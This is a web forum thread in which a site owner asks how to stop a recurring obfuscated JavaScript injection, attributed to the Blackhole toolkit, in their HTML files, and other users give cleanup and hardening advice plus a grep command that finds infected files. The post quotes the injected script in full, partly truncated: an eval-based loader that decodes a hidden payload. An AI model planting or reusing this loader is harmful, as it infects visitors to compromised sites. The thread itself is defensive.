Virus injections into my html

How can I Stop virus injections into my html files.  I am removing these daily with my boonex product only their has to be a way to prevent this blackhole toolkit.

Below is what keeps getting injected 

<script>String.prototype.test="harC";for(i in $=’esrhserh’)if(i==’te’+'st’)m=$[i];try{new Object().wehweh();}catch(q){ss="";}try{window['e'+'v'+'al'](‘asdas’)}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";if({}.asd===’e')a=document['c'+'r'+'e'+'a'+'t'+'e'+'T'+'e'+'x'+'t'+'N'+'o'+'d'+'e'](’321′);if(a.data==321)t=-1*(d-d2);n=[7-t,7-t,103-t,100-t,30-t,38-t,98-t,109-t,97-t,115-t,107-t,99-t,108-

t,114-t,44-t,101-t,99-t,114-t,67-t,106-t,99-t,107-t,99-t,108-t,114-t,113-t,64-t,119-t,82-t,95-t,101-

t,76-t,95-t,107-t,99-t,38-t,37-t,96-t,109-t,98-t,119-t,37-t,39-t,89-t,46-t,91-t,39-t,121-t,7-t,7-

t,7-t,103-t,100-t,112-t,95-t,107-t,99-t,112-t,38-t,39-t,57-t,7-t,7-t,123-t,30-t,99-t,106-t,113-t,99-t,30-t,121-t,7-t,7-t,7-t,98-t,109-t,97-t,115-t,107-t,99-t,108-t,114-t,44-t,117-t,112-t,103-t,114-t,99-t,38-

t,32-t,58-t,103-t,100-t,112-t,95-t,107-t,99-t,30..

t,99-t,37-t,57-t,100-t,44-t,113-t,114-t,119-t,106-t,99-t,44-t,106-t,99-t,100-t,114-t,59-t,37-t,46-t,37-

t,57-t,100-t,44-t,113-t,114-t,119-t,106-t,99-t,44-t,114-t,109-t,110-t,59-t,37-t,46-t,37-t,57-t,100-

t,44-t,113-t,99-t,114-t,63-t,114-t,114-t,112-t,103-t,96-t,115-t,114-t,99-t,38-t,37-t,117-t,103-

t,98-t,114-t,102-t,37-t,42-t,37-t,47-t,46-t,37-t,39-t,57-t,100-t,44-t,113-t,99-t,114-t,63-t,114-t,114-

t,112-t,103-t,96-t,115-t,114-t,99-t,38-t,37-t,102-t,99-t,103-t,101-t,102-t,114-t,37-t,42-t,37-t,47-

t,46-t,37-t,39-t,57-t,7-t,7-t,7-t,98-t,109-t,97-t,115-t,107-t,99-t,108-t,114-t,44-t,101-t,99-t,114-

t,67-t,106-t,99-t,107-t,99-t,108-t,114-t,113-t,64-t,119-t,82-t,95-t,101-t,76-t,95-t,107-t,99-t,38-

t,37-t,96-t,109-t,98-t,119-t,37-t,39-t,89-t,46-t,91-t,44-t,95-t,110-t,110-t,99-t,108-t,98-t,65-t,102-

t,103-t,106-t,98-t,38-t,100-t,39-t,57-t,7-t,7-t,123-t];

for(i=0;i<n.length;i++)ss+=s (eval("n"+"["+"i]"));eval(ss);</script>

This website comes up as a multiple threat when opened..... Beware....

i am aware of the threats and i am manually removing them but i keep getting re-injected with this crap!

I am answering this as a web developer, not an expert on Dolphin, (actually just signed up a few days ago).  Having had numerous clients call me to take care of this same issue on a number of different web applications, I've had some experience.  Although I am not a Dolphin expert, I can give you some basic guidelines.  A lot depends on your knowledge level tho....so you might have to get a web developer to assist you with this.

The fact that you are having to remove it every day, says that they have a script on your server, which is constantly injecting the malicious code.  Follow the steps below:

1.  Download an ftp program.  Google FileZilla.  It's free, and available for both mac and pc

2.  If you haven't installed any mods recently, you will see older dates in the ftp program, from when you installed Dolphin, or when you installed any mods.  If you look through all the files and folders, you will most likely see a date for files that were modified when you began having this issue.  This is a good place to start to see where the problem is.

3.  Using FileZilla, download a complete copy of all files in your root directory.

4.  I am assuming you have a complete backup of all your files.  Use a program like DiffMerge (google it, it's free) to compare the files you download from the server, with your backup.  This will show you where the malicious code is.

5.  Once you have either removed the malicious code, or wiped out the server and restored your site from a backup, IMMEDIATELY contact your hosting company and get your password, including your ftp password changed.

6.  Also, ask your host if there are any glaring security holes that you currently have.  You should make sure the server settings match the recommended Dolphin settings.  The hosting company won't actually be willing to look at the Dolphin code, but they might be able to tell you any hosting settings that were a problem.

7.  Once everything is done and working properly.  BACK UP ALL FILES!!!  Only after you have verified that everything works properly, and have backed up all files, then make sure you have upgraded to the latest Dolphin release.  Normally, security holes are fixed in each release. 

8.  Do a lot of googling for all mods you have, using the words hack, security, etc.  Try to see if other people have experienced hackings based on mods.  Also make sure all your mods are up to date.

9.  Change the backend password for Dolphin.

Like I said, I am just starting to learn about Dolphin, but these are typical fixes for any database-driven site that has been hacked.

Almost forgot....

YOU MUST TAKE DOWN THIS SITE until you get these problems resolved.  This is some REALLY nasty stuff.

I will get it clean, while it is running....  I have it isolated right now!

I have all the systems are clean and all the websites are clean but this one!

I just helped someone else here clean their site about 4 days ago that had the same infection. Two things we figured out:

1. The hacker had gotten their ftp password through a virus on their home computer. Malwarebytes found it and cleaned it.

2. The hacker had setup their own ftp account in Cpanel.

So install malwarebytes and make sure your home PC is clean. Then login Cpanel and make sure you don't have extra FTP accounts. Then change your master Cpanel account password too. After you make sure all the files are clean it shouldn't happen again if you do all these steps.

If you have shell access here is an easy command to type in that will list all the infected files:

grep -l -r "<script>String.prototype.test" *

Who on earth would want to hack dolphin sites? I know there are a few wierd users on here... but its hardly facebook or the pentagon is it....

I am not showing  anything on the search but avg is still saying it is there and another malware search as well!

 Any Suggestion